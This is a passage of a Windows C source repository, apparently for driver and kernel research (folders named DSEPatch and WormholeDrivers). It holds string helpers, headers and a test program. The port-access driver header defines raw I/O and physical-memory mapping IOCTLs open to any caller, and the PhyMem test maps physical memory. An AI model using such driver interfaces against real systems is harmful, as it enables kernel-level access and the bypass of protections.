 * when anything is written. A null dest or src, or ccdest == 0, returns
 * dest untouched. The caller is not told when the source was cut short.
 */
char *_strncpy_a(char *dest, size_t ccdest, const char *src, size_t ccsrc)
{
    size_t n = 0;
    size_t limit;

    if (dest == 0 || src == 0 || ccdest == 0)
        return dest;

    /* the smaller of the two bounds decides how much may be copied */
    limit = ccdest - 1;
    if (ccsrc < limit)
        limit = ccsrc;

    while (n < limit && src[n] != 0) {
        dest[n] = src[n];
        n++;
    }

    dest[n] = 0;
    return dest;
}
24 |
/*
 * _strncpy_w - copy up to ccsrc elements of src into a buffer of ccdest
 * wchar_t elements.
 *
 * One slot of dest is reserved for the terminator, so at most
 * ccdest - 1 elements are copied and the result is always terminated
 * when anything is written. A null dest or src, or ccdest == 0, returns
 * dest untouched. Counts are in elements, not bytes.
 */
wchar_t *_strncpy_w(wchar_t *dest, size_t ccdest, const wchar_t *src, size_t ccsrc)
{
    size_t n = 0;
    size_t limit;

    if (dest == 0 || src == 0 || ccdest == 0)
        return dest;

    /* the smaller of the two bounds decides how much may be copied */
    limit = ccdest - 1;
    if (ccsrc < limit)
        limit = ccsrc;

    while (n < limit && src[n] != 0) {
        dest[n] = src[n];
        n++;
    }

    dest[n] = 0;
    return dest;
}
46 |
--------------------------------------------------------------------------------
/source/StripDebug/minirtl/cmdline.h:
--------------------------------------------------------------------------------
1 | #ifndef _CMDLINEH_
2 | #define _CMDLINEH_
3 |
/*
 * Command-line helpers; only the prototypes are visible in this header.
 *
 * NOTE(review): going by the names, GetCommandLineParam* presumably
 * copies parameter number ParamIndex of CmdLine into Buffer and reports
 * its length through ParamLen. Confirm against the implementation whether
 * BufferSize is counted in characters or bytes and whether Buffer is
 * terminated when the parameter does not fit.
 */
BOOL GetCommandLineParamW(
    IN LPCWSTR CmdLine,
    IN ULONG ParamIndex,
    OUT LPWSTR Buffer,
    IN ULONG BufferSize,
    OUT PULONG ParamLen
);

BOOL GetCommandLineParamA(
    IN LPCSTR CmdLine,
    IN ULONG ParamIndex,
    OUT LPSTR Buffer,
    IN ULONG BufferSize,
    OUT PULONG ParamLen
);

/*
 * NOTE(review): ExtractFilePath* takes no size for FilePath (presumably
 * the output buffer), so the callee cannot bound its writes; callers have
 * to size FilePath from FileName themselves.
 */
char *ExtractFilePathA(const char *FileName, char *FilePath);
wchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath);
22 |
23 | #ifdef UNICODE
24 |
25 | #define ExtractFilePath ExtractFilePathW
26 | #define GetCommandLineParam GetCommandLineParamW
27 |
28 | #else // ANSI
29 |
30 | #define ExtractFilePath ExtractFilePathA
31 | #define GetCommandLineParam GetCommandLineParamA
32 |
33 | #endif
34 |
35 | #endif /* _CMDLINEH_ */
36 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/minirtl/cmdline.h:
--------------------------------------------------------------------------------
1 | #ifndef _CMDLINEH_
2 | #define _CMDLINEH_
3 |
/*
 * Prototypes for the command-line parsing helpers; definitions live in
 * another file.
 *
 * NOTE(review): the parameter names suggest that Buffer receives the
 * ParamIndex-th parameter of CmdLine and that ParamLen receives its
 * length -- verify, and check the unit of BufferSize (characters vs
 * bytes) before relying on it for bounds.
 */
BOOL GetCommandLineParamW(
    IN LPCWSTR CmdLine,
    IN ULONG ParamIndex,
    OUT LPWSTR Buffer,
    IN ULONG BufferSize,
    OUT PULONG ParamLen
);

BOOL GetCommandLineParamA(
    IN LPCSTR CmdLine,
    IN ULONG ParamIndex,
    OUT LPSTR Buffer,
    IN ULONG BufferSize,
    OUT PULONG ParamLen
);

/*
 * NOTE(review): no capacity is passed for FilePath, so any bound on the
 * output has to be enforced by the caller.
 */
char *ExtractFilePathA(const char *FileName, char *FilePath);
wchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath);
22 |
23 | #ifdef UNICODE
24 |
25 | #define ExtractFilePath ExtractFilePathW
26 | #define GetCommandLineParam GetCommandLineParamW
27 |
28 | #else // ANSI
29 |
30 | #define ExtractFilePath ExtractFilePathA
31 | #define GetCommandLineParam GetCommandLineParamA
32 |
33 | #endif
34 |
35 | #endif /* _CMDLINEH_ */
36 |
--------------------------------------------------------------------------------
/source/ROS/srvany2/srvany2/minirtl/cmdline.h:
--------------------------------------------------------------------------------
1 | #ifndef _CMDLINEH_
2 | #define _CMDLINEH_
3 |
/*
 * Declarations of the command-line helpers used by this project; the
 * bodies are not part of this header.
 *
 * NOTE(review): Buffer/BufferSize/ParamLen look like an output buffer,
 * its capacity and the resulting length -- confirm the capacity unit
 * (characters vs bytes) and the truncation behaviour in the source file.
 */
BOOL GetCommandLineParamW(
    IN LPCWSTR CmdLine,
    IN ULONG ParamIndex,
    OUT LPWSTR Buffer,
    IN ULONG BufferSize,
    OUT PULONG ParamLen
);

BOOL GetCommandLineParamA(
    IN LPCSTR CmdLine,
    IN ULONG ParamIndex,
    OUT LPSTR Buffer,
    IN ULONG BufferSize,
    OUT PULONG ParamLen
);

/*
 * NOTE(review): FilePath has no accompanying size argument; the caller
 * must make sure it is large enough for whatever is written.
 */
char *ExtractFilePathA(const char *FileName, char *FilePath);
wchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath);
22 |
23 | #ifdef UNICODE
24 |
25 | #define ExtractFilePath ExtractFilePathW
26 | #define GetCommandLineParam GetCommandLineParamW
27 |
28 | #else // ANSI
29 |
30 | #define ExtractFilePath ExtractFilePathA
31 | #define GetCommandLineParam GetCommandLineParamA
32 |
33 | #endif
34 |
35 | #endif /* _CMDLINEH_ */
36 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Source/Dll/Port32.h:
--------------------------------------------------------------------------------
1 | #ifndef PORT32_H
2 | #define PORT32_H
3 |
/* Byte packing for the structures below, which use split base/limit/offset
 * fields and bit-fields and rely on having no padding between members.
 * NOTE(review): bit-field ordering is compiler-defined; these layouts
 * assume the compiler the project was written for. */
#pragma pack(1)

/* One x86 segment descriptor as stored in the GDT. Base and limit are
 * split across several fields, as the field names show. */
struct GDT_DESCRIPTOR
{
    WORD Limit_0_15;
    WORD Base_0_15;
    BYTE Base_16_23;
    BYTE Type : 4;
    BYTE System : 1;
    BYTE DPL : 2;           /* descriptor privilege level */
    BYTE Present : 1;
    BYTE Limit_16_19 : 4;
    BYTE Available : 1;
    BYTE Reserved : 1;
    BYTE D_B : 1;
    BYTE Granularity : 1;
    BYTE Base_24_31;
};

/* A call-gate descriptor: target selector plus a 32-bit offset split into
 * two halves, and the gate's parameter count, type and privilege bits.
 * NOTE(review): the code that fills these in is not visible here; a gate
 * with a permissive DPL is callable from user mode, so how DPL is set
 * where this is used deserves a look. */
struct CALLGATE_DESCRIPTOR
{
    WORD Offset_0_15;
    WORD Selector;
    WORD ParamCount : 5;
    WORD Unused : 3;
    WORD Type : 4;
    WORD System : 1;
    WORD DPL : 2;
    WORD Present : 1;
    WORD Offset_16_31;
};

/* Limit and 32-bit base of the GDT; six bytes under pack(1). */
struct GDTR
{
    WORD wGDTLimit;
    DWORD dwGDTBase;
};

#pragma pack()
43 |
44 | #endif
--------------------------------------------------------------------------------
/source/wdextract/wdextract/wdextract.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | C:\wdbase\mpasbase.dll
5 | WindowsLocalDebugger
6 |
7 |
8 | c:\wdbase\mpavbase.vdm
9 | WindowsLocalDebugger
10 |
11 |
12 | C:\wdbase\mpasbase.dll
13 | WindowsLocalDebugger
14 |
15 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/minirtl/_strncmp.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/*
 * _strncmp_a - compare at most cchars characters of two strings.
 *
 * Returns 0 when the pointers are identical, when cchars is 0, or when
 * the compared prefixes match; -1 when only s1 is null; 1 when only s2
 * is null; otherwise the difference of the first differing pair.
 *
 * The null checks come before the cchars check, so a null argument
 * decides the result even when cchars is 0.
 */
int _strncmp_a(const char *s1, const char *s2, size_t cchars)
{
    char a, b;

    if (s1 == s2)
        return 0;
    if (s1 == 0)
        return -1;
    if (s2 == 0)
        return 1;
    if (cchars == 0)
        return 0;

    for (;;) {
        a = *s1++;
        b = *s2++;
        cchars--;
        if (a == 0 || a != b || cchars == 0)
            break;
    }

    return (int)(a - b);
}
29 |
/*
 * _strncmp_w - compare at most cchars elements of two wide strings.
 *
 * Returns 0 when the pointers are identical, when cchars is 0, or when
 * the compared prefixes match; -1 when only s1 is null; 1 when only s2
 * is null; otherwise the difference of the first differing pair.
 * cchars counts elements, not bytes.
 */
int _strncmp_w(const wchar_t *s1, const wchar_t *s2, size_t cchars)
{
    wchar_t a, b;

    if (s1 == s2)
        return 0;
    if (s1 == 0)
        return -1;
    if (s2 == 0)
        return 1;
    if (cchars == 0)
        return 0;

    for (;;) {
        a = *s1++;
        b = *s2++;
        cchars--;
        if (a == 0 || a != b || cchars == 0)
            break;
    }

    return (int)(a - b);
}
56 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/INPOUT/HWInterfaceDrv.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 9.00
3 | # Visual Studio 2005
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HWInterfaceDrv", "HWInterfaceDrv.vcproj", "{95B297EE-9E8E-464B-B626-A69C9ED13158}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Release|Win32 = Release|Win32
10 | EndGlobalSection
11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
12 | {95B297EE-9E8E-464B-B626-A69C9ED13158}.Debug|Win32.ActiveCfg = Debug|Win32
13 | {95B297EE-9E8E-464B-B626-A69C9ED13158}.Debug|Win32.Build.0 = Debug|Win32
14 | {95B297EE-9E8E-464B-B626-A69C9ED13158}.Release|Win32.ActiveCfg = Release|Win32
15 | {95B297EE-9E8E-464B-B626-A69C9ED13158}.Release|Win32.Build.0 = Release|Win32
16 | EndGlobalSection
17 | GlobalSection(SolutionProperties) = preSolution
18 | HideSolutionNode = FALSE
19 | EndGlobalSection
20 | EndGlobal
21 |
--------------------------------------------------------------------------------
/source/StripDebug/minirtl/rtltypes.h:
--------------------------------------------------------------------------------
1 | #ifndef _WCHAR_T_DEFINED
2 | typedef unsigned short wchar_t;
3 | #define _WCHAR_T_DEFINED
4 | #endif /* _WCHAR_T_DEFINED */
5 |
6 | #ifndef _SIZE_T_DEFINED
7 | #ifdef _WIN64
8 | typedef unsigned __int64 size_t;
9 | #else /* _WIN64 */
10 | typedef __w64 unsigned int size_t;
11 | #endif /* _WIN64 */
12 | #define _SIZE_T_DEFINED
13 | #endif /* _SIZE_T_DEFINED */
14 |
/* Fold 'A'..'Z' to lower case by adding 0x20; any other value is
 * returned unchanged. No locale is consulted. */
__forceinline char locase_a(char c)
{
    return ((c >= 'A') && (c <= 'Z')) ? (char)(c + 0x20) : c;
}
22 |
/* Wide variant: folds only 'A'..'Z' by adding 0x20. Upper-case letters
 * outside ASCII are returned unchanged. */
__forceinline wchar_t locase_w(wchar_t c)
{
    return ((c >= 'A') && (c <= 'Z')) ? (wchar_t)(c + 0x20) : c;
}
30 |
/* Absolute value of a char. The negation is converted back to char, so
 * for the most negative value of a signed char the result does not fit
 * and stays negative on typical two's-complement targets. */
__forceinline char byteabs(char x) {
    return (x < 0) ? -x : x;
}
36 |
/* Returns 1 for '0'..'9' and 0 for everything else. */
__forceinline int _isdigit_a(char x) {
    if (x < '0' || x > '9')
        return 0;
    return 1;
}
40 |
/* Returns 1 for L'0'..L'9' and 0 for everything else; digits from other
 * scripts are not recognised. */
__forceinline int _isdigit_w(wchar_t x) {
    if (x < L'0' || x > L'9')
        return 0;
    return 1;
}
44 |
--------------------------------------------------------------------------------
/source/ApiSetSchema/minirtl/rtltypes.h:
--------------------------------------------------------------------------------
1 | #ifndef _WCHAR_T_DEFINED
2 | typedef unsigned short wchar_t;
3 | #define _WCHAR_T_DEFINED
4 | #endif /* _WCHAR_T_DEFINED */
5 |
6 | #ifndef _SIZE_T_DEFINED
7 | #ifdef _WIN64
8 | typedef unsigned __int64 size_t;
9 | #else /* _WIN64 */
10 | typedef __w64 unsigned int size_t;
11 | #endif /* _WIN64 */
12 | #define _SIZE_T_DEFINED
13 | #endif /* _SIZE_T_DEFINED */
14 |
/* ASCII-only lower-casing: 'A'..'Z' become 'a'..'z', everything else
 * passes through untouched. */
__forceinline char locase_a(char c)
{
    if ((c < 'A') || (c > 'Z'))
        return c;
    return c + 0x20;
}
22 |
/* ASCII-only lower-casing for wide characters: 'A'..'Z' become
 * 'a'..'z', every other code unit passes through untouched. */
__forceinline wchar_t locase_w(wchar_t c)
{
    if ((c < 'A') || (c > 'Z'))
        return c;
    return c + 0x20;
}
30 |
/* Magnitude of a char value. Negative inputs are negated; because the
 * result is returned as char, the most negative signed value cannot be
 * represented and comes back negative on two's-complement targets. */
__forceinline char byteabs(char x) {
    return (x < 0) ? -x : x;
}
36 |
/* Non-zero (1) exactly when x is one of '0'..'9'. */
__forceinline int _isdigit_a(char x) {
    return (x < '0' || x > '9') ? 0 : 1;
}
40 |
/* Non-zero (1) exactly when x is one of L'0'..L'9'. */
__forceinline int _isdigit_w(wchar_t x) {
    return (x < L'0' || x > L'9') ? 0 : 1;
}
44 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/minirtl/rtltypes.h:
--------------------------------------------------------------------------------
1 | #ifndef _WCHAR_T_DEFINED
2 | typedef unsigned short wchar_t;
3 | #define _WCHAR_T_DEFINED
4 | #endif /* _WCHAR_T_DEFINED */
5 |
6 | #ifndef _SIZE_T_DEFINED
7 | #ifdef _WIN64
8 | typedef unsigned __int64 size_t;
9 | #else /* _WIN64 */
10 | typedef __w64 unsigned int size_t;
11 | #endif /* _WIN64 */
12 | #define _SIZE_T_DEFINED
13 | #endif /* _SIZE_T_DEFINED */
14 |
/* Fold 'A'..'Z' to lower case by adding 0x20; any other value is
 * returned unchanged. No locale is consulted. */
__forceinline char locase_a(char c)
{
    return ((c >= 'A') && (c <= 'Z')) ? (char)(c + 0x20) : c;
}
22 |
/* Wide variant: folds only 'A'..'Z' by adding 0x20. Upper-case letters
 * outside ASCII are returned unchanged. */
__forceinline wchar_t locase_w(wchar_t c)
{
    return ((c >= 'A') && (c <= 'Z')) ? (wchar_t)(c + 0x20) : c;
}
30 |
/* Absolute value of a char. The negation is converted back to char, so
 * for the most negative value of a signed char the result does not fit
 * and stays negative on typical two's-complement targets. */
__forceinline char byteabs(char x) {
    return (x < 0) ? -x : x;
}
36 |
/* Returns 1 for '0'..'9' and 0 for everything else. */
__forceinline int _isdigit_a(char x) {
    if (x < '0' || x > '9')
        return 0;
    return 1;
}
40 |
/* Returns 1 for L'0'..L'9' and 0 for everything else; digits from other
 * scripts are not recognised. */
__forceinline int _isdigit_w(wchar_t x) {
    if (x < L'0' || x > L'9')
        return 0;
    return 1;
}
44 |
--------------------------------------------------------------------------------
/source/ROS/srvany2/srvany2/minirtl/rtltypes.h:
--------------------------------------------------------------------------------
1 | #ifndef _WCHAR_T_DEFINED
2 | typedef unsigned short wchar_t;
3 | #define _WCHAR_T_DEFINED
4 | #endif /* _WCHAR_T_DEFINED */
5 |
6 | #ifndef _SIZE_T_DEFINED
7 | #ifdef _WIN64
8 | typedef unsigned __int64 size_t;
9 | #else /* _WIN64 */
10 | typedef __w64 unsigned int size_t;
11 | #endif /* _WIN64 */
12 | #define _SIZE_T_DEFINED
13 | #endif /* _SIZE_T_DEFINED */
14 |
/* ASCII-only lower-casing: 'A'..'Z' become 'a'..'z', everything else
 * passes through untouched. */
__forceinline char locase_a(char c)
{
    if ((c < 'A') || (c > 'Z'))
        return c;
    return c + 0x20;
}
22 |
/* ASCII-only lower-casing for wide characters: 'A'..'Z' become
 * 'a'..'z', every other code unit passes through untouched. */
__forceinline wchar_t locase_w(wchar_t c)
{
    if ((c < 'A') || (c > 'Z'))
        return c;
    return c + 0x20;
}
30 |
/* Magnitude of a char value. Negative inputs are negated; because the
 * result is returned as char, the most negative signed value cannot be
 * represented and comes back negative on two's-complement targets. */
__forceinline char byteabs(char x) {
    return (x < 0) ? -x : x;
}
36 |
/* Non-zero (1) exactly when x is one of '0'..'9'. */
__forceinline int _isdigit_a(char x) {
    return (x < '0' || x > '9') ? 0 : 1;
}
40 |
/* Non-zero (1) exactly when x is one of L'0'..L'9'. */
__forceinline int _isdigit_w(wchar_t x) {
    return (x < L'0' || x > L'9') ? 0 : 1;
}
44 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/dlldata.c:
--------------------------------------------------------------------------------
1 | /*********************************************************
2 | DllData file -- generated by MIDL compiler
3 |
4 | DO NOT ALTER THIS FILE
5 |
6 | This file is regenerated by MIDL on every IDL file compile.
7 |
8 | To completely reconstruct this file, delete it and rerun MIDL
9 | on all the IDL files in this DLL, specifying this file for the
10 | /dlldata command line option
11 |
12 | *********************************************************/
13 |
14 | #define PROXY_DELEGATION
15 |
16 | #include
17 |
18 | #ifdef __cplusplus
19 | extern "C" {
20 | #endif
21 |
22 | EXTERN_PROXY_FILE( AmsiScan )
23 |
24 |
25 | PROXYFILE_LIST_START
26 | /* Start of list */
27 | REFERENCE_PROXY_FILE( AmsiScan ),
28 | /* End of list */
29 | PROXYFILE_LIST_END
30 |
31 |
32 | DLLDATA_ROUTINES( aProxyFileList, GET_DLL_CLSID )
33 |
34 | #ifdef __cplusplus
35 | } /*extern "C" */
36 | #endif
37 |
38 | /* end of generated dlldata file */
39 |
--------------------------------------------------------------------------------
/source/ApiSetSchema/minirtl/_strncmpi.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/*
 * _strncmpi_a - case-insensitive comparison of at most cchars characters.
 *
 * Returns 0 when the pointers are identical, when cchars is 0, or when
 * the folded prefixes match; -1 when only s1 is null; 1 when only s2 is
 * null; otherwise the difference of the first differing folded pair.
 *
 * Folding goes through locase_a, which in this project's rtltypes.h maps
 * only 'A'..'Z'.
 */
int _strncmpi_a(const char *s1, const char *s2, size_t cchars)
{
    char a, b;

    if (s1 == s2)
        return 0;
    if (s1 == 0)
        return -1;
    if (s2 == 0)
        return 1;
    if (cchars == 0)
        return 0;

    for (;;) {
        a = locase_a(*s1);
        b = locase_a(*s2);
        s1++;
        s2++;
        cchars--;
        if (a == 0 || a != b || cchars == 0)
            break;
    }

    return (int)(a - b);
}
29 |
/*
 * _strncmpi_w - case-insensitive comparison of at most cchars wide
 * characters.
 *
 * Returns 0 when the pointers are identical, when cchars is 0, or when
 * the folded prefixes match; -1 when only s1 is null; 1 when only s2 is
 * null; otherwise the difference of the first differing folded pair.
 *
 * Folding goes through locase_w, which in this project's rtltypes.h maps
 * only 'A'..'Z'. cchars counts elements, not bytes.
 */
int _strncmpi_w(const wchar_t *s1, const wchar_t *s2, size_t cchars)
{
    wchar_t a, b;

    if (s1 == s2)
        return 0;
    if (s1 == 0)
        return -1;
    if (s2 == 0)
        return 1;
    if (cchars == 0)
        return 0;

    for (;;) {
        a = locase_w(*s1);
        b = locase_w(*s2);
        s1++;
        s2++;
        cchars--;
        if (a == 0 || a != b || cchars == 0)
            break;
    }

    return (int)(a - b);
}
56 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/minirtl/_strncmpi.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/*
 * _strncmpi_a - compare up to cchars characters ignoring ASCII case.
 *
 * Identical pointers compare equal; a lone null s1 yields -1, a lone
 * null s2 yields 1, and cchars == 0 yields 0 (checked in that order).
 * Otherwise characters are folded with locase_a and compared in step
 * until they differ, the terminator is hit, or cchars runs out.
 */
int _strncmpi_a(const char *s1, const char *s2, size_t cchars)
{
    char left, right;
    size_t remaining;

    if (s1 == s2)
        return 0;
    if (s1 == 0)
        return -1;
    if (s2 == 0)
        return 1;
    if (cchars == 0)
        return 0;

    remaining = cchars;
    do {
        left = locase_a(*s1);
        right = locase_a(*s2);
        s1++;
        s2++;
        remaining--;
    } while (remaining > 0 && left != 0 && left == right);

    return (int)(left - right);
}
29 |
/*
 * _strncmpi_w - compare up to cchars wide characters ignoring ASCII case.
 *
 * Identical pointers compare equal; a lone null s1 yields -1, a lone
 * null s2 yields 1, and cchars == 0 yields 0 (checked in that order).
 * Otherwise characters are folded with locase_w and compared in step
 * until they differ, the terminator is hit, or cchars runs out.
 */
int _strncmpi_w(const wchar_t *s1, const wchar_t *s2, size_t cchars)
{
    wchar_t left, right;
    size_t remaining;

    if (s1 == s2)
        return 0;
    if (s1 == 0)
        return -1;
    if (s2 == 0)
        return 1;
    if (cchars == 0)
        return 0;

    remaining = cchars;
    do {
        left = locase_w(*s1);
        right = locase_w(*s2);
        s1++;
        s2++;
        remaining--;
    } while (remaining > 0 && left != 0 && left == right);

    return (int)(left - right);
}
56 |
--------------------------------------------------------------------------------
/source/StripDebug/StripDebug.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 14
4 | VisualStudioVersion = 14.0.25420.1
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "StripDebug", "StripDebug.vcxproj", "{177E3B73-F1F9-4C70-AFFF-9474DECEDAD1}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {177E3B73-F1F9-4C70-AFFF-9474DECEDAD1}.Debug|x64.ActiveCfg = Debug|x64
15 | {177E3B73-F1F9-4C70-AFFF-9474DECEDAD1}.Debug|x64.Build.0 = Debug|x64
16 | {177E3B73-F1F9-4C70-AFFF-9474DECEDAD1}.Release|x64.ActiveCfg = Release|x64
17 | {177E3B73-F1F9-4C70-AFFF-9474DECEDAD1}.Release|x64.Build.0 = Release|x64
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | EndGlobal
23 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderC/AmsiProviderServer/minirtl/rtltypes.h:
--------------------------------------------------------------------------------
1 | #ifndef _WCHAR_T_DEFINED
2 | typedef unsigned short wchar_t;
3 | #define _WCHAR_T_DEFINED
4 | #endif /* _WCHAR_T_DEFINED */
5 |
6 | #ifndef _SIZE_T_DEFINED
7 | #ifdef _WIN64
8 | typedef unsigned __int64 size_t;
9 | #else /* _WIN64 */
10 | typedef __w64 unsigned int size_t;
11 | #endif /* _WIN64 */
12 | #define _SIZE_T_DEFINED
13 | #endif /* _SIZE_T_DEFINED */
14 |
/* Fold 'A'..'Z' to lower case by adding 0x20; any other value is
 * returned unchanged. No locale is consulted. */
__forceinline char locase_a(char c)
{
    return ((c >= 'A') && (c <= 'Z')) ? (char)(c + 0x20) : c;
}
22 |
/* Wide variant: folds only 'A'..'Z' by adding 0x20. Upper-case letters
 * outside ASCII are returned unchanged. */
__forceinline wchar_t locase_w(wchar_t c)
{
    return ((c >= 'A') && (c <= 'Z')) ? (wchar_t)(c + 0x20) : c;
}
30 |
/* Absolute value of a char. The negation is converted back to char, so
 * for the most negative value of a signed char the result does not fit
 * and stays negative on typical two's-complement targets. */
__forceinline char byteabs(char x) {
    return (x < 0) ? -x : x;
}
36 |
/* Returns 1 for '0'..'9' and 0 for everything else. */
__forceinline int _isdigit_a(char x) {
    if (x < '0' || x > '9')
        return 0;
    return 1;
}
40 |
/* Returns 1 for L'0'..L'9' and 0 for everything else; digits from other
 * scripts are not recognised. */
__forceinline int _isdigit_w(wchar_t x) {
    if (x < L'0' || x > L'9')
        return 0;
    return 1;
}
44 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/INPOUT/hwinterfacedrv.rc:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
// Version-resource values for the driver image. File type and subtype
// mark it as a system driver; _AMD64_ selects the x64 or 32-bit file and
// product names.
// NOTE(review): these strings presumably end up in the file's version
// resource through common.ver, included after this block. That makes the
// original-filename, product and company strings usable for inventorying
// where this port-access driver is installed.
#define VER_FILETYPE VFT_DRV
#define VER_FILESUBTYPE VFT2_DRV_SYSTEM
#ifdef _AMD64_
#define VER_INTERNALNAME_STR "inpoutx64.sys"
#define VER_ORIGINALFILENAME_STR "inpoutx64.sys"
#define VER_PRODUCTNAME_STR "inpoutx64 Driver Version 1.2"
#define VER_PRODUCTVERSION_STR "1.2 x64"
#else
#define VER_INTERNALNAME_STR "inpout32.sys"
#define VER_ORIGINALFILENAME_STR "inpout32.sys"
#define VER_PRODUCTNAME_STR "inpout32 Driver Version 1.2"
#define VER_PRODUCTVERSION_STR "1.2"
#endif
#define VER_FILEDESCRIPTION_STR "Kernel level port access driver"
#define VER_COMPANYNAME_STR "Highresolution Enterprises [www.highrez.co.uk]"
#define VER_LEGALCOPYRIGHT_STR "Copyright (c) 2008 Highresolution Enterprises. Portions Copyright (c) Logix4u"
#define VER_PRODUCTVERSION 1,2,00,000
21 |
22 | #include "common.ver"
23 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/INPOUT/hwinterfacedrv.h:
--------------------------------------------------------------------------------
1 |
/*
 * I/O control codes for port access. Each literal is the signed 32-bit value
 * of the CTL_CODE(...) expression quoted beside it: device type 40000,
 * functions 0x801-0x806, METHOD_BUFFERED, FILE_ANY_ACCESS.
 *
 * NOTE(review): with FILE_ANY_ACCESS the I/O manager does not check the access
 * rights of the caller's handle for these requests. Whoever can open the
 * device can therefore issue raw port reads and writes unless the device
 * object's security descriptor or the driver's dispatch routine restricts
 * it - confirm both in the driver source, which is not part of this header.
 */
2 | #define IOCTL_READ_PORT_UCHAR -1673519100 //CTL_CODE(40000, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS)
3 | #define IOCTL_WRITE_PORT_UCHAR -1673519096 //CTL_CODE(40000, 0x802, METHOD_BUFFERED, FILE_ANY_ACCESS)
4 | #define IOCTL_READ_PORT_USHORT -1673519092 //CTL_CODE(40000, 0x803, METHOD_BUFFERED, FILE_ANY_ACCESS)
5 | #define IOCTL_WRITE_PORT_USHORT -1673519088 //CTL_CODE(40000, 0x804, METHOD_BUFFERED, FILE_ANY_ACCESS)
6 | #define IOCTL_READ_PORT_ULONG -1673519084 //CTL_CODE(40000, 0x805, METHOD_BUFFERED, FILE_ANY_ACCESS)
7 | #define IOCTL_WRITE_PORT_ULONG -1673519080 //CTL_CODE(40000, 0x806, METHOD_BUFFERED, FILE_ANY_ACCESS)
8 |
/*
 * Physical-memory map/unmap requests. The two values continue the numbering
 * above: they equal CTL_CODE(40000, 0x807, METHOD_BUFFERED, FILE_ANY_ACCESS)
 * and CTL_CODE(40000, 0x808, METHOD_BUFFERED, FILE_ANY_ACCESS), so the same
 * FILE_ANY_ACCESS consideration applies to them.
 */
9 | #define IOCTL_WINIO_MAPPHYSTOLIN -1673519076
10 | #define IOCTL_WINIO_UNMAPPHYSADDR -1673519072
11 |
/* Byte packing: the structure below is laid out without padding. */
12 | #pragma pack(push)
13 | #pragma pack(1)
14 |
/*
 * Descriptor of a physical-memory mapping.
 * NOTE(review): presumably the buffer exchanged with the two IOCTL_WINIO_*
 * requests above - confirm against the driver. HANDLE, SIZE_T and PVOID are
 * pointer-sized, so the layout differs between 32-bit and 64-bit builds; a
 * caller and a driver of different bitness would not agree on it.
 */
15 | struct tagPhys32Struct
16 | {
17 | HANDLE PhysicalMemoryHandle; // presumably a handle to the mapped physical-memory object - TODO confirm
18 | SIZE_T dwPhysMemSizeInBytes; // size of the range in bytes (per the name)
19 | PVOID pvPhysAddress; // physical address of the range (per the name)
20 | PVOID pvPhysMemLin; // linear (virtual) address of the mapping (per the name)
21 | };
22 |
/* A single shared instance, defined in another translation unit. */
23 | extern struct tagPhys32Struct Phys32Struct;
24 |
25 | #pragma pack(pop)
--------------------------------------------------------------------------------
/source/NtCall64_LogParser/NtCall64_LogParser.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PhyMem/test/test.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include "pmdll.h"
5 |
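/*
 * Console smoke test for the PhyMem DLL declared in pmdll.h.
 *
 * Loads the driver, maps and unmaps a 20-byte physical range, walks every
 * bus/device/function combination of PCI configuration space and prints the
 * vendor and device ID of each function that answers, then unloads the driver.
 *
 * Returns 0 on completion; terminates with exit code -1 when the driver
 * cannot be loaded.
 */
int main()
{
    // Nothing below works without the driver, so stop early.
    if (LoadPhyMemDriver() == FALSE)
    {
        printf("load phymem.sys failed\n");
        exit(-1);
    }

    // Map 20 bytes of physical memory starting at 0xF7020 into this process.
    char *va = (char*)MapPhyMem(0xF7020, 20);
    if (va != NULL)
    {
        // %p instead of %08x: passing a pointer for %x is undefined and
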